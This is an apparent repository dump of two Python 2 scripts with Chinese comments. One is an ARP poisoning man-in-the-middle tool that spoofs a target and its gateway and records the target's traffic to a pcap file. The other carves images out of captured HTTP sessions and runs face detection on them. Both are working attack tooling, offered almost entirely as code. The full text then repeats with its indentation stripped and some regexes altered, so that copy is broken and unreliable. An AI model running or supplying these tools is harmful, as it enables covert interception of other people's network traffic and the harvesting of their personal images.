ttcmk/2_arp_poison_arp_poison.py

## 2_arp_poison_arp_poison.py
# -*- coding: utf-8 -*-

from scapy.all import *
import os
import sys
import threading
import signal


# 运行前，Mac：sudo sysctl -w net.inet.ip.forwarding=1
# Linux: echo 1 > /proc/sys/net/ipv4/ip_forward


def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    # 以下代码中调用send函数的方式稍有不同
    print "[*] Restoring target... "
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)

    # 发送退出信号到主线程
    os.kill(os.getpid(), signal.SIGINT)


def get_mac(ip_address):
    # 形如：(<Results: TCP:0 UDP:0 ICMP:1 Other:0>, <Unanswered: TCP:0 UDP:0 ICMP:0 Other:0>)
    responses, unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address), timeout=2, retry=10)
    # 返回从响应数据中获取的MAC地址
    for s, r in responses:
        return r[Ether].src

    return None


def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
    # 构建欺骗目标的ARP请求()，这里没设置hwsrc,默认就是本机咯
    poison_target = ARP()
    poison_target.op = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst = target_mac

    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst = gateway_mac

    print "[*] Beginning the ARP Poison. [CTRL-C to stop]"

    while True:
        try:
            send(poison_target)
            send(poison_gateway)

            time.sleep(2)
        except KeyboardInterrupt:
            restore_target(gateway_ip, gateway_mac, target_ip, target_mac)

    print "[*] ARP Poison attack finished"
    return


interface = "eth0"
target_ip = "192.168.1.7"
gateway_ip = "192.168.1.1"
packet_count = 1000

# 设置嗅探的网卡
conf.iface = interface

# 关闭输出
conf.verb = 0

print "[*] Setting up %s" % interface

gateway_mac = get_mac(gateway_ip)

if gateway_mac is None:
    print "[!!!] Failed to get gateway MAC. Exiting"
    sys.exit(0)
else:
    print "[*] Gateway %s is at %s" % (gateway_ip, gateway_mac)

target_mac = get_mac(target_ip)

if target_mac is None:
    print "[!!!] Failed to get target MAC. Exiting"
    sys.exit(0)
else:
    print "[*] Target %s is at %s" % (target_ip, target_mac)

# 启动ARP投毒线程
poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()

try:
    print "[*] Starting sniffer for %d packets" % packet_count

    bpf_sniffer = "ip host %s" % target_ip
    packets = sniff(count=packet_count, filter=bpf_sniffer, iface=interface)

    # 将捕获的数据包输出到文件
    wrpcap('arper.pcap', packets)

    # 还原网络配置
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)

except KeyboardInterrupt:
    # 还原网络配置
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
    sys.exit(0)

## 2_arp_poison_pic_carver.py
# -*- coding: utf-8 -*-

import re
import zlib
import cv2

from scapy.all import *

picture_directory = "./pictures"
faces_directory = "./faces"
pcap_file = "bhp.pcap"

def get_http_headers(http_payload):
    try:
        # 如果为HTTP流量，提取HTTP头
        headers_raw = http_payload[:http_payload.index("\r\n\r\n") + 2]

        # 对HTTP头进行切分
        # (?P<name>.*?) ---> 对找到的结果进行进一步分割成字典形式
        # 如：dict(re.findall(r"(?P<name>.*?): (?P<value>.*?)\r\n", "Content-Type: image/pgf\r\n"))
        # 输出：{'Content-Type': 'image/pgf'}
        headers = dict(re.findall(r"(?P<name>.*?): (?P<value>.*?)\r\n", headers_raw))

    except:
        return None

    if "Content-Type" not in headers:
        return None

    return headers


def extract_image(headers, http_payload):
    image = None
    image_type = None

    try:
        if "image" in headers['Content-Type']:

            # 获取图像的类型和图像数据
            image_type = headers['Content-Type'].split("/")[1]

            image = http_payload[http_payload.index("\r\n\r\n") + 4:]

            # 如果进行了数据压缩则解压
            try:
                if "Content-Encoding" in headers.keys():
                    if headers['Content-Encoding'] == 'gzip':
                        image = zlib.decompress(image, 16 + zlib.MAX_WBITS)
                    elif headers['Content-Encoding'] == 'deflate':
                        image = zlib.decompress(image)
            except:
                pass
    except:
        return None, None

    return image, image_type


def face_detect(path, file_name):

    img = cv2.imread(path)
    cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")
    rects = cascade.detectMultiScale(img, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20))

    if len(rects) == 0:
        return False

    rects[:, 2:] += rects[:, :2]

    # 对图像中的人脸进行高亮显示处理
    for x1,y1,x2,y2 in rects:
        cv2.rectangle(img, (x1,y1), (x2,y2), (127,255,0), 2)

    cv2.imwrite("%s/%s-%s" % (faces_directory, pcap_file, file_name), img)

    return True


def http_assembler(pcap_file):
    carved_images = 0
    faces_detected = 0

    a = rdpcap(pcap_file)

    sessions = a.sessions()

    for session in sessions:
        http_payload = ""

        for packet in sessions[session]:

            # 这一步与在Wireshark中右键 Follow TCP Stream 相似
            try:
                if packet[TCP].dport == 80 or packet[TCP].sport == 80:
                    # 对数据组包
                    http_payload += str(packet[TCP].payload)

            except:
                pass

        headers = get_http_headers(http_payload)

        if headers is None:
            continue

        image, image_type = extract_image(headers, http_payload)

        if image is not None and image_type is not None:
            # 存储图像
            file_name = "%s-pic_carver_%d.%s" % (pcap_file, carved_images, image_type)

            fd = open("%s/%s" % (picture_directory, file_name), "wb")
            fd.write(image)
            fd.close()

            carved_images += 1

            # 开始人脸检测
            try:
                result = face_detect("%s/%s" % (picture_directory, file_name), file_name)

                if result is True:
                    faces_detected += 1

            except:
                pass
    return carved_images, faces_detected


if __name__ == '__main__':
    carved_images, faces_detected = http_assembler(pcap_file)

    print "Extracted: %d images" % carved_images
    print "Detected: %d faces" % faces_detected
	# -- coding: utf-8 --

	from scapy.all import *
	import os
	import sys
	import threading
	import signal


	# 运行前，Mac：sudo sysctl -w net.inet.ip.forwarding=1
	# Linux: echo 1 > /proc/sys/net/ipv4/ip_forward


	def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
	# 以下代码中调用send函数的方式稍有不同
	print "[*] Restoring target... "
	send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
	send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)

	# 发送退出信号到主线程
	os.kill(os.getpid(), signal.SIGINT)


	def get_mac(ip_address):
	# 形如：(<Results: TCP:0 UDP:0 ICMP:1 Other:0>, <Unanswered: TCP:0 UDP:0 ICMP:0 Other:0>)
	responses, unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address), timeout=2, retry=10)
	# 返回从响应数据中获取的MAC地址
	for s, r in responses:
	return r[Ether].src

	return None


	def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
	# 构建欺骗目标的ARP请求()，这里没设置hwsrc,默认就是本机咯
	poison_target = ARP()
	poison_target.op = 2
	poison_target.psrc = gateway_ip
	poison_target.pdst = target_ip
	poison_target.hwdst = target_mac

	poison_gateway = ARP()
	poison_gateway.op = 2
	poison_gateway.psrc = target_ip
	poison_gateway.pdst = gateway_ip
	poison_gateway.hwdst = gateway_mac

	print "[*] Beginning the ARP Poison. [CTRL-C to stop]"

	while True:
	try:
	send(poison_target)
	send(poison_gateway)

	time.sleep(2)
	except KeyboardInterrupt:
	restore_target(gateway_ip, gateway_mac, target_ip, target_mac)

	print "[*] ARP Poison attack finished"
	return


	interface = "eth0"
	target_ip = "192.168.1.7"
	gateway_ip = "192.168.1.1"
	packet_count = 1000

	# 设置嗅探的网卡
	conf.iface = interface

	# 关闭输出
	conf.verb = 0

	print "[*] Setting up %s" % interface

	gateway_mac = get_mac(gateway_ip)

	if gateway_mac is None:
	print "[!!!] Failed to get gateway MAC. Exiting"
	sys.exit(0)
	else:
	print "[*] Gateway %s is at %s" % (gateway_ip, gateway_mac)

	target_mac = get_mac(target_ip)

	if target_mac is None:
	print "[!!!] Failed to get target MAC. Exiting"
	sys.exit(0)
	else:
	print "[*] Target %s is at %s" % (target_ip, target_mac)

	# 启动ARP投毒线程
	poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac, target_ip, target_mac))
	poison_thread.start()

	try:
	print "[*] Starting sniffer for %d packets" % packet_count

	bpf_sniffer = "ip host %s" % target_ip
	packets = sniff(count=packet_count, filter=bpf_sniffer, iface=interface)

	# 将捕获的数据包输出到文件
	wrpcap('arper.pcap', packets)

	# 还原网络配置
	restore_target(gateway_ip, gateway_mac, target_ip, target_mac)

	except KeyboardInterrupt:
	# 还原网络配置
	restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
	sys.exit(0)
	# -- coding: utf-8 --

	import re
	import zlib
	import cv2

	from scapy.all import *

	picture_directory = "./pictures"
	faces_directory = "./faces"
	pcap_file = "bhp.pcap"

	def get_http_headers(http_payload):
	try:
	# 如果为HTTP流量，提取HTTP头
	headers_raw = http_payload[:http_payload.index("\r\n\r\n") + 2]

	# 对HTTP头进行切分
	# (?P<name>.*?) ---> 对找到的结果进行进一步分割成字典形式
	# 如：dict(re.findall(r"(?P<name>.?): (?P<value>.?)\r\n", "Content-Type: image/pgf\r\n"))
	# 输出：{'Content-Type': 'image/pgf'}
	headers = dict(re.findall(r"(?P<name>.?): (?P<value>.?)\r\n", headers_raw))

	except:
	return None

	if "Content-Type" not in headers:
	return None

	return headers


	def extract_image(headers, http_payload):
	image = None
	image_type = None

	try:
	if "image" in headers['Content-Type']:

	# 获取图像的类型和图像数据
	image_type = headers['Content-Type'].split("/")[1]

	image = http_payload[http_payload.index("\r\n\r\n") + 4:]

	# 如果进行了数据压缩则解压
	try:
	if "Content-Encoding" in headers.keys():
	if headers['Content-Encoding'] == 'gzip':
	image = zlib.decompress(image, 16 + zlib.MAX_WBITS)
	elif headers['Content-Encoding'] == 'deflate':
	image = zlib.decompress(image)
	except:
	pass
	except:
	return None, None

	return image, image_type


	def face_detect(path, file_name):

	img = cv2.imread(path)
	cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")
	rects = cascade.detectMultiScale(img, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20))

	if len(rects) == 0:
	return False

	rects[:, 2:] += rects[:, :2]

	# 对图像中的人脸进行高亮显示处理
	for x1,y1,x2,y2 in rects:
	cv2.rectangle(img, (x1,y1), (x2,y2), (127,255,0), 2)

	cv2.imwrite("%s/%s-%s" % (faces_directory, pcap_file, file_name), img)

	return True


	def http_assembler(pcap_file):
	carved_images = 0
	faces_detected = 0

	a = rdpcap(pcap_file)

	sessions = a.sessions()

	for session in sessions:
	http_payload = ""

	for packet in sessions[session]:

	# 这一步与在Wireshark中右键 Follow TCP Stream 相似
	try:
	if packet[TCP].dport == 80 or packet[TCP].sport == 80:
	# 对数据组包
	http_payload += str(packet[TCP].payload)

	except:
	pass

	headers = get_http_headers(http_payload)

	if headers is None:
	continue

	image, image_type = extract_image(headers, http_payload)

	if image is not None and image_type is not None:
	# 存储图像
	file_name = "%s-pic_carver_%d.%s" % (pcap_file, carved_images, image_type)

	fd = open("%s/%s" % (picture_directory, file_name), "wb")
	fd.write(image)
	fd.close()

	carved_images += 1

	# 开始人脸检测
	try:
	result = face_detect("%s/%s" % (picture_directory, file_name), file_name)

	if result is True:
	faces_detected += 1

	except:
	pass
	return carved_images, faces_detected


	if __name__ == '__main__':
	carved_images, faces_detected = http_assembler(pcap_file)

	print "Extracted: %d images" % carved_images
	print "Detected: %d faces" % faces_detected